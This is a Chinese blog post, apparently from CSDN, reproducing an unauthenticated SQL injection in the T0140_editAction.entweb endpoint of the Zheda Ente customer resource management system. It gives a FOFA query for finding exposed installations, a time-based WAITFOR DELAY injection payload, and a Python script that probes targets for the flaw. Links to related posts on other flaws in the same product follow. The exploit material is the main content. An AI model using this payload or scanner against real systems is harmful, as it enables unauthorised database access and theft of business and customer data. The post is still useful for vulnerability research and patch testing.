浙大恩特客户资源管理系统 SQL注入漏洞(2023年11月发布)

最新推荐文章于 2024-07-12 15:53:09 发布
最新推荐文章于 2024-07-12 15:53:09 发布
阅读量614 收藏 7
点赞数 9
分类专栏: 最新漏洞追踪与复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73896875/article/details/134594172
版权

漏洞简介

 浙大恩特客户资源管理系统中T0140_editAction.entweb接口处存在SQL注入漏洞,未经身份认证的攻击者可以利用该漏洞获取系统数据库敏感信息,深入利用可获取服务器权限。

漏洞等级高危
影响版本*
漏洞类型SQL注入

产品简介

浙大恩特客户资源管理系统是一款针对企业客户资源管理的软件产品。该系统旨在帮助企业高效地管理和利用客户资源,提升销售和市场营销的效果。

网络测绘

FOFA:app="浙大恩特客户资源管理系统"

漏洞复现

手动验证POC

ip:port/entsoft/T0140_editAction.entweb;.js?method=getdocumentnumFlag&documentnum=1';WAITFOR+DELAY+'0:0:5'

python自动验证脚本

#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
"""
@Project :漏洞复现POC 
@File    :浙大恩特客户资源管理系统 SQL注入漏洞(2023年11月发布).py
@Author  :星之尘
@Date    :2023/11/24 11:44 
@脚本说明:
"""
import requests
from requests import Timeout
from urllib3.exceptions import InsecureRequestWarning
headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
        }

def scan(url,path1,path2):
    if not url.endswith("/"):
        url = url + '/'
        print(url)
    if not url.startswith('http://') and not url.startswith('https://'):
        url = 'http://' + url
    encodetext1 = url + path1
    encodetext2 = url +path2
    print(f"扫描目标: {url}")
    print("---------------------------------------------------")
    flag1 = 0
    flag2 = 0
    try:
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        req1 = requests.get(encodetext1, headers=headers, verify=False, timeout=20)
        if req1.status_code == 200 and "0" in req1.text:
            flag1 = 1

        req2 = requests.get(encodetext2, headers=headers, verify=False, timeout=20)
        if req2.status_code == 200 and "0" not in req2.text:
            flag2 = 1
        if flag1 and flag2:
            print(f"[-] {url} 存在浙大恩特客户资源管理系统 SQL注入漏洞")
        else:
            print(f"[-] {url} 不存在浙大恩特客户资源管理系统 SQL注入漏洞")
    except Timeout:
        print(f"[!] 请求超时,跳过URL: {url}", "yellow")
    except Exception as e:
        if 'HTTPSConnectionPool' in str(e) or 'Burp Suite Professional' in str(e):
            print(f"[-] {url} 证书校验错误或者证书被拒绝")
        else:
            print(str(e))


if __name__ == "__main__":
    url = "your ip:port"
    path1 = "/entsoft/T0140_editAction.entweb;.js?method=getdocumentnumFlag&documentnum=1"
    path2 = "/entsoft/T0140_editAction.entweb;.js?method=getdocumentnumFlag&documentnum=1'"
    scan(url, path1,path2)

EternalStarCity
关注
  • 9
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞复现】浙大恩特CRM大客户系统sql注入0day(三)
失心少年
11-20 281
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。浙大恩特客户资源管理系统中的T0140_editAction.entweb接口存在SQL注入漏洞,攻击者可通过此漏洞获取企业数据库内数据,威胁其他数据安全。杭州恩软信息技术有限公司(浙大恩特)提供外贸管理软件、外贸客户管理软件等外贸软件,是一家专注于外贸客户资源管理及订单管理产品及服务的综合性公司。
漏洞复现】浙大恩特客户资源管理系统Ri0004_openFileByStream.jsp接口存在任意文件读取漏洞
失心少年
04-18 49
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。漏洞链接:http://127.0.0.1/entsoft/module/i0004_openFileByStream.jsp;
浙大恩特客户资源管理系统-FollowAction接口存在SQL注入漏洞(附漏洞利用脚本)
jjjj1029056414的博客
02-20 475
浙大恩特客户资源管理系统-FollowAction接口存在SQL注入漏洞,附带自己写的poc脚本
浙大恩特客户资源管理系统 FollowAction SQL注入漏洞复现(含nuclei-POC)_浙大恩特资源管理
m0_62261166的博客
04-16 327
最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。该系统旨在帮助企业高效地管理和利用客户资源,提升销售和市场营销的效果。相比起繁琐的文字,还是生动的视频教程更加适合零基础的同学们学习,这里也是整理了一份与上述学习路线一一对应的网络安全视频教程。当然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份。
漏洞复现】浙大恩特客户资源管理系统 fileupload.jsp 任意文件上传漏洞
做自己喜欢的事,并将其发挥到极致!
11-15 839
杭州恩软信息技术有限公司(简称浙大恩特)提供外贸管理软件、外贸客户管理软件等外贸软件,是一家专注于外贸客户资源管理及订单管理产品及服务的综合性公司,该系统旨在帮助企业高效管理客户关系,提升销售业绩,促进市场营销和客户服务的优化。系统支持客户数据分析和报表展示,帮助企业深度挖掘客户数据,提供决策参考。
浙大恩特客户资源管理系统任意文件上传漏洞复现
0xSec
11-10 1515
浙大恩特客户资源管理系统中fileupload.jsp、CustomerAction.entphone、MailAction.entphone、machord_doc.jsp等接口处存在文件上传漏洞,未经身份认证的攻击者可以上传任意后门文件,最终可导致服务器失陷。
浙大恩特客户资源管理系统 SQL注入漏洞复现
0xSec
11-17 791
浙大恩特客户资源管理系统中T0140_editAction.entweb接口处存在SQL注入漏洞,未经身份认证的攻击者可以利用该漏洞获取系统数据库敏感信息,深入利用可获取服务器权限。
【复现】浙大恩特客户资源管理系统 SQL注入漏洞_71
fushuang333的博客
04-11 382
【复现】浙大恩特客户资源管理系统 SQL注入漏洞,攻击者未经授权可以访问数据库中的数据,盗取用户的隐私以及个人信息,造成用户的信息泄露。
浙大恩特客户资源管理系统 SQL注入漏洞202311发布)_浙大恩特漏洞(1)
2401_83947255的博客
04-20 379
浙大恩特客户资源管理系统是一款针对企业客户资源管理的软件产品。该系统旨在帮助企业高效地管理和利用客户资源,提升销售和市场营销的效果。
漏洞复现】浙大恩特客户资源管理系统 CompInfoAction存在SQL注入漏洞
https://blog.echo234.cn/
03-30 272
浙大恩特客户资源管理系统是一款专为外向型企业设计的先进管理工具。该系统以客户需求为导向,通过整合企业内外部资源,实现客户信息的全面管理和深度分析。该系统还具有强大的数据分析和挖掘功能,可以帮助企业深入挖掘客户需求,制定针对性的销售策略,提升客户满意度和忠诚度。同时,系统还支持自定义配置和扩展,可以根据企业的实际需求进行灵活调整,满足企业的个性化管理需求。总之,浙大恩特客户资源管理系统是一款高效、实用的管理工具,能够帮助企业更好地管理客户资源,提升销售业绩和客户满意度,是企业信息化建设的得力助手。浙大恩特客户
浙大恩特外贸客户管理系统使用手册
11-10
浙大恩特外贸客户管理系统,浙大恩特外贸客户管理系统使用手册
恩特软件操作流程样本.doc
12-18
恩特软件操作流程样本.doc 恩特软件操作流程样本是一种外贸软件顾客手册,旨在指导用户快速...该手册涵盖了登入系统、帐号管理、基本设立、邮箱设立和客户跟进等模块,旨在帮助用户快速上手恩特软件,提高工作效率。
Ent animated character 恩特动画角色 游戏树怪模型带动画资源包unitypackage项目
04-15
Ent animated character 恩特动画角色 游戏树怪模型带动画资源包unitypackage项目 支持Unity版本2019.2.18或更高 动画 走 闲置的 空闲时间长 空闲_长_2 攻击 损害 死亡 纹理 512x512 多边形 3093
软件企业市场营销策略研究—以浙大恩特网络科技有限公司为例.doc
11-25
软件企业市场营销策略研究—以浙大恩特网络科技有限公司为例.doc
恩特雷加
02-21
"恩特雷加"可能是指一个与C++编程相关的项目或软件工程的交付物。由于提供的信息有限,我将基于“C++”这一标签来详细阐述C++编程语言的相关知识点。 C++是一种强大的、面向对象的编程语言,由Bjarne Stroustrup于...
移动互联安全扩展要求测评项
hakksjss的博客
07-10 1100
应为无线接入设备的安装选择合理位置,避免过度覆盖和电磁干扰。无线接入设备的安装位置选择不当,易被攻击者利用,特别是攻击者会通过无线信号过度覆盖的弱点进行无线渗透攻击,因此要选择合理的位置安装无线接入设备。
车载视频监控管理方案:无人驾驶出租车安全出行的保障
最新发布
TSINGSEE青犀视频官方技术博客
07-12 589
为了确保数据的安全性和可靠性,本方案采用云存储技术,将车辆视频数据和相关信息存储在云端。
中小学校园EasyCVR视频综合监管方案:构建安全、智能的校园环境
TSINGSEE青犀视频官方技术博客
07-10 1112
针对校园食堂后厨、仓库、配菜、清洗等监控区域的环境卫生与安全等进行全面的监管,及时发现违规异常情况,并能向监管人员及时发送告警信息,保障在校师生的食品与饮食安全
恩特软件操作流程.doc
04-25
"恩特软件操作流程.doc 是一份详细阐述如何使用浙大恩特外贸软件的用户手册。该软件主要用于管理外贸企业的各项业务流程,包括客户管理、跟进联系、统计分析等多个方面。" 文档首先介绍了快速管理入门,指导用户...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值